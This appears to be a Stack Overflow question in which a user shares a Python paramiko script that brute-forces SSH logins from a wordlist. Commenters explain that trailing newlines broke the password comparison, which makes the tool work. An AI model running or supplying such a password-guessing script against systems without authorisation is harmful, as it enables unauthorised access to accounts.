# Why does my SSH bruter say that the correct password is not correct?

Tags: python, linux, ssh

I have written an SSH bruteforce tool using Python from scratch, however, if I put my correct SSH password at any line in the wordlist, it will fail unless I put it at the last line.

EDIT: thanks to khelwood and "that other guy", my code works now <3
Thank you guys, I appreciate it.

Here's the code:

```
import paramiko
from paramiko import BadAuthenticationType

passlist = open("word.txt", "r")

def brute(ip, user, passwd):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()

for psd in passlist:
    psd = str(psd)
    try:
        brute("machine_ip", "machine_user", psd)
        print("[*] Correct password: " + psd)
    except paramiko.ssh_exception.AuthenticationException:
        print("[!] Password incorrect: " + psd)
```

Comment: When you iterate through a file, each line has `\n` (a newline) at the end. Try using `.strip()`.

Comment: Thanks, but where do I put `.strip()`?

Comment: Protip: it's humans and not computers that are bad at accurately comparing strings. Whenever you have a string that a computer rejects for being different or invalid, your first instinct should be to dump each byte and/or unicode value.

Comment: Replace `psd = str(psd)` with `psd = psd.rstrip('\n')` to remove trailing newlines.